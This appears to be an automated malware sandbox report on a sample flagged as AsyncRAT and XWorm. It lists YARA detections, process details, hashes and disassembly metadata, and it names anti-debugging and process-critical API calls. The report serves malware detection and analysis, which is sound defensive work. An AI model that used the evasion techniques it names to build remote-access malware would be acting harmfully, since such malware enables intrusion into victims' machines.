                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:05:15:06
                                          Start date:05/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\x.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Local\Temp\x.exe
                                          Imagebase:0x560000
                                          File size:210'432 bytes
                                          MD5 hash:74D8F5A1E068A454FFAA5C8FD32A3E44
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 74%, ReversingLabs
                                          • Detection: 77%, Virustotal, Browse
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:05:16:36
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\WerFault.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5808 -s 2288
                                          Imagebase:0x7ff6d9ce0000
                                          File size:570'736 bytes
                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:14.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:3
                                            Total number of Limit Nodes:0
                                            execution_graph 521 7ff8470209fd 522 7ff847020a03 FreeConsole 521->522 524 7ff847020aae 522->524

                                            Callgraph

                                            Executed Functions

                                            Function 00007FF8470209FD Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2152827645.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID: ConsoleFree
                                            • String ID:
                                            • API String ID: 771614528-0
                                            • Opcode ID: 2e7b88027d71df04802c8f37300fa852463274ba2499be8fa79cff3a6f86da48
                                            • Instruction ID: 9114688f00ef9cea91f573a1c21aa22f86a1f46a5a37326322890841ffb99802
                                            • Opcode Fuzzy Hash: 2e7b88027d71df04802c8f37300fa852463274ba2499be8fa79cff3a6f86da48
                                            • Instruction Fuzzy Hash: 9831E43190DB588FDB59DF68D84AAFA7BF0EF55320F04416FD08AC3592CA78A846CB51

                                            Execution Graph

                                            Execution Coverage:18.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:50%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0

                                            Executed Functions

                                            Function 00007FF8470210FA Relevance: 4.5, Strings: 3, Instructions: 762COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 7ff8470210fa-7ff847021141 3 7ff847021143-7ff847021149 0->3 4 7ff847021176-7ff84702117d 0->4 5 7ff84702114b-7ff847021175 3->5 6 7ff84702117e-7ff84702119e 3->6 4->6 5->4 11 7ff8470211a0 6->11 12 7ff8470211a5-7ff8470211a6 6->12 11->12 13 7ff8470211a8 12->13 14 7ff8470211ac-7ff8470211ae 12->14 13->14 15 7ff8470211b0 14->15 16 7ff8470211b3-7ff8470211b6 14->16 15->16 17 7ff8470211b8 16->17 18 7ff8470211ba-7ff8470211be 16->18 17->18 19 7ff8470211c1-7ff847021200 18->19 20 7ff8470211c0 18->20 23 7ff84702189e-7ff8470218e5 19->23 24 7ff847021206-7ff84702139e call 7ff847020620 * 11 call 7ff847020a38 19->24 20->19 77 7ff8470213a8-7ff847021403 call 7ff8470204b0 call 7ff847020348 call 7ff847020358 24->77 78 7ff8470213a0-7ff8470213a7 24->78 89 7ff847021407-7ff84702141a 77->89 78->77 91 7ff84702142d-7ff84702143d 89->91 92 7ff84702141c-7ff847021426 89->92 95 7ff84702143f-7ff84702144a 91->95 96 7ff847021465-7ff847021485 91->96 92->91 95->89 98 7ff84702144c-7ff84702145e call 7ff847020348 95->98 103 7ff847021487-7ff847021491 call 7ff847020368 96->103 104 7ff847021496-7ff847021578 96->104 98->96 103->104 118 7ff84702157a-7ff8470215ad 104->118 119 7ff8470215c6-7ff8470215f9 104->119 118->119 126 7ff8470215af-7ff8470215bc 118->126 130 7ff8470215fb-7ff84702161c 119->130 131 7ff84702161e-7ff84702164e 119->131 126->119 129 7ff8470215be-7ff8470215c4 126->129 129->119 132 7ff847021656-7ff84702168d 130->132 131->132 139 7ff84702168f-7ff8470216b0 132->139 140 7ff8470216b2-7ff8470216e2 132->140 142 7ff8470216ea-7ff8470216ff 139->142 140->142 144 7ff847021701-7ff84702170f 142->144 145 7ff847021710-7ff8470217cc call 7ff847020378 call 7ff8470209d8 call 7ff847021008 142->145 144->145 163 7ff8470217ce call 7ff8470207a8 145->163 164 7ff8470217d3-7ff84702186c 145->164 163->164
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: N_H$3N_^$SAN_^
                                            • API String ID: 0-1389020372
                                            • Opcode ID: efc5e62e455a264787de2133c3c7da321ff1c2e677b0accc6d88f935c91ece04
                                            • Instruction ID: a1bf2eff100ad210e4278451d6bf5120b2fe1ffd7ac43540cb713729278cd7f1
                                            • Opcode Fuzzy Hash: efc5e62e455a264787de2133c3c7da321ff1c2e677b0accc6d88f935c91ece04
                                            • Instruction Fuzzy Hash: D432E622B2EA559FEB58FB7894592BD77D1FF88790F400579D04DC32C6DE28AC418741
                                            Function 00007FF847027301 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 263 7ff847027301-7ff8470273bd CheckRemoteDebuggerPresent 266 7ff8470273bf 263->266 267 7ff8470273c5-7ff847027408 263->267 266->267
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 0514eff98a863a43881e671dfdab971b9907cc3a60489ce2c8cff4f14a65b8e8
                                            • Instruction ID: c1c862189b2982b9131a97cac93cd0d12e9102dd6d34604823eb860ea513e5b3
                                            • Opcode Fuzzy Hash: 0514eff98a863a43881e671dfdab971b9907cc3a60489ce2c8cff4f14a65b8e8
                                            • Instruction Fuzzy Hash: 153112319087188FCB58DF58C88A7ED7BE0EF65321F05426BD489D7292DB34A846CB91
                                            Function 00007FF847025D56 Relevance: .5, Instructions: 474COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 531 7ff847025d56-7ff847025d63 532 7ff847025d6e-7ff847025e37 531->532 533 7ff847025d65-7ff847025d6d 531->533 537 7ff847025e39-7ff847025e42 532->537 538 7ff847025ea3 532->538 533->532 537->538 539 7ff847025e44-7ff847025e50 537->539 540 7ff847025ea5-7ff847025eca 538->540 541 7ff847025e89-7ff847025ea1 539->541 542 7ff847025e52-7ff847025e64 539->542 547 7ff847025ecc-7ff847025ed5 540->547 548 7ff847025f36 540->548 541->540 543 7ff847025e68-7ff847025e7b 542->543 544 7ff847025e66 542->544 543->543 546 7ff847025e7d-7ff847025e85 543->546 544->543 546->541 547->548 550 7ff847025ed7-7ff847025ee3 547->550 549 7ff847025f38-7ff847025fe0 548->549 561 7ff84702604e 549->561 562 7ff847025fe2-7ff847025fec 549->562 551 7ff847025f1c-7ff847025f34 550->551 552 7ff847025ee5-7ff847025ef7 550->552 551->549 554 7ff847025ef9 552->554 555 7ff847025efb-7ff847025f0e 552->555 554->555 555->555 556 7ff847025f10-7ff847025f18 555->556 556->551 563 7ff847026050-7ff847026079 561->563 562->561 564 7ff847025fee-7ff847025ffb 562->564 571 7ff84702607b-7ff847026086 563->571 572 7ff8470260e3 563->572 565 7ff847025ffd-7ff84702600f 564->565 566 7ff847026034-7ff84702604c 564->566 568 7ff847026011 565->568 569 7ff847026013-7ff847026026 565->569 566->563 568->569 569->569 570 7ff847026028-7ff847026030 569->570 570->566 571->572 573 7ff847026088-7ff847026096 571->573 574 7ff8470260e5-7ff847026176 572->574 575 7ff847026098-7ff8470260aa 573->575 576 7ff8470260cf-7ff8470260e1 573->576 582 7ff84702617c-7ff84702618b 574->582 578 7ff8470260ac 575->578 579 7ff8470260ae-7ff8470260c1 575->579 576->574 578->579 579->579 580 7ff8470260c3-7ff8470260cb 579->580 580->576 583 7ff84702618d 582->583 584 7ff847026193-7ff8470261f8 call 7ff847026214 582->584 583->584 591 7ff8470261fa 584->591 592 7ff8470261ff-7ff847026213 584->592 591->592
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c77f2132805874af1ad3b5d2d46ecce15b23d12e2e069620a3e5a00c0047382
                                            • Instruction ID: 99bc71e59962575c89f730ee23221d3f8cd8858b3970634fabcc1166c125609a
                                            • Opcode Fuzzy Hash: 5c77f2132805874af1ad3b5d2d46ecce15b23d12e2e069620a3e5a00c0047382
                                            • Instruction Fuzzy Hash: 8AF1923191DA8D8FEFA8EF28C8557E937D1FF54350F04426AE84DC7695CB38A8458B82
                                            Function 00007FF847026B02 Relevance: .5, Instructions: 459COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 593 7ff847026b02-7ff847026b0f 594 7ff847026b1a-7ff847026be7 593->594 595 7ff847026b11-7ff847026b19 593->595 599 7ff847026be9-7ff847026bf2 594->599 600 7ff847026c53 594->600 595->594 599->600 602 7ff847026bf4-7ff847026c00 599->602 601 7ff847026c55-7ff847026c7a 600->601 608 7ff847026c7c-7ff847026c85 601->608 609 7ff847026ce6 601->609 603 7ff847026c39-7ff847026c51 602->603 604 7ff847026c02-7ff847026c14 602->604 603->601 606 7ff847026c18-7ff847026c2b 604->606 607 7ff847026c16 604->607 606->606 610 7ff847026c2d-7ff847026c35 606->610 607->606 608->609 611 7ff847026c87-7ff847026c93 608->611 612 7ff847026ce8-7ff847026d0d 609->612 610->603 613 7ff847026ccc-7ff847026ce4 611->613 614 7ff847026c95-7ff847026ca7 611->614 618 7ff847026d7b 612->618 619 7ff847026d0f-7ff847026d19 612->619 613->612 615 7ff847026ca9 614->615 616 7ff847026cab-7ff847026cbe 614->616 615->616 616->616 620 7ff847026cc0-7ff847026cc8 616->620 622 7ff847026d7d-7ff847026dab 618->622 619->618 621 7ff847026d1b-7ff847026d28 619->621 620->613 623 7ff847026d2a-7ff847026d3c 621->623 624 7ff847026d61-7ff847026d79 621->624 629 7ff847026e1b 622->629 630 7ff847026dad-7ff847026db8 622->630 625 7ff847026d3e 623->625 626 7ff847026d40-7ff847026d53 623->626 624->622 625->626 626->626 628 7ff847026d55-7ff847026d5d 626->628 628->624 631 7ff847026e1d-7ff847026ef5 629->631 630->629 632 7ff847026dba-7ff847026dc8 630->632 642 7ff847026efb-7ff847026f0a 631->642 633 7ff847026dca-7ff847026ddc 632->633 634 7ff847026e01-7ff847026e19 632->634 636 7ff847026dde 633->636 637 7ff847026de0-7ff847026df3 633->637 634->631 636->637 637->637 638 7ff847026df5-7ff847026dfd 637->638 638->634 643 7ff847026f0c 642->643 644 7ff847026f12-7ff847026f74 call 7ff847026f90 642->644 643->644 651 7ff847026f7b-7ff847026f8f 644->651 652 7ff847026f76 644->652 652->651
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 922279ae465c87cb8981df2939d2211721fe51a511d4576fd16b5be431569d76
                                            • Instruction ID: b1a909f4434c0e79184d737ee43ed72db579876e9ecf39e42aa17ecfddc033ba
                                            • Opcode Fuzzy Hash: 922279ae465c87cb8981df2939d2211721fe51a511d4576fd16b5be431569d76
                                            • Instruction Fuzzy Hash: A7E1A03190DA8E8FEFA8EF28C8557E977E1FB54350F14426ED84DC7695CE78A8408B81
                                            Function 00007FF847021C11 Relevance: .4, Instructions: 389COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a587817130e488c62aa8740e66b6f7934d489f25b038efc1b30c8a6eadb221c
                                            • Instruction ID: 3cb14678cc7f9360d11f293c9a5578f472ad6759e82704b5502258ade862d17c
                                            • Opcode Fuzzy Hash: 2a587817130e488c62aa8740e66b6f7934d489f25b038efc1b30c8a6eadb221c
                                            • Instruction Fuzzy Hash: 7EC1B031F1EA4A9FEF88EB68845577D76D2EF98384F14457AD05EC32D2DE28AC028741
                                            Function 00007FF847028BBD Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 256 7ff847028bbd-7ff847028ca0 RtlSetProcessIsCritical 260 7ff847028ca8-7ff847028cdd 256->260 261 7ff847028ca2 256->261 261->260
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID: CriticalProcess
                                            • String ID:
                                            • API String ID: 2695349919-0
                                            • Opcode ID: aaa8f63ab93248e71848f494e30e97db54223f6d592cd10a1fc75c4dfa4c4f0a
                                            • Instruction ID: bccb23247783f22591ebaf9f01ebbfcfe7138ba9d8f0e4b9b70708f81c59b6b3
                                            • Opcode Fuzzy Hash: aaa8f63ab93248e71848f494e30e97db54223f6d592cd10a1fc75c4dfa4c4f0a
                                            • Instruction Fuzzy Hash: 3541C33180C7498FDB19DFA8D845AE9BBF0EF56311F04416ED08AD3692CB78A846CB91

                                            Non-executed Functions

                                            Function 00007FF847025859 Relevance: .4, Instructions: 414COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d515504b74ed5858c730d5a3a20c00c8ea0cf78695010f16c0a5132e566ad5a
                                            • Instruction ID: deceac570b4ecd32187ee28d7099a1e9339ff3ab0883171019c7b10988ce1319
                                            • Opcode Fuzzy Hash: 3d515504b74ed5858c730d5a3a20c00c8ea0cf78695010f16c0a5132e566ad5a
                                            • Instruction Fuzzy Hash: CFD1B33191DA8D8FEBA8EF28C8557E977D1FF59350F04426EE84DC7291CB74A8408B82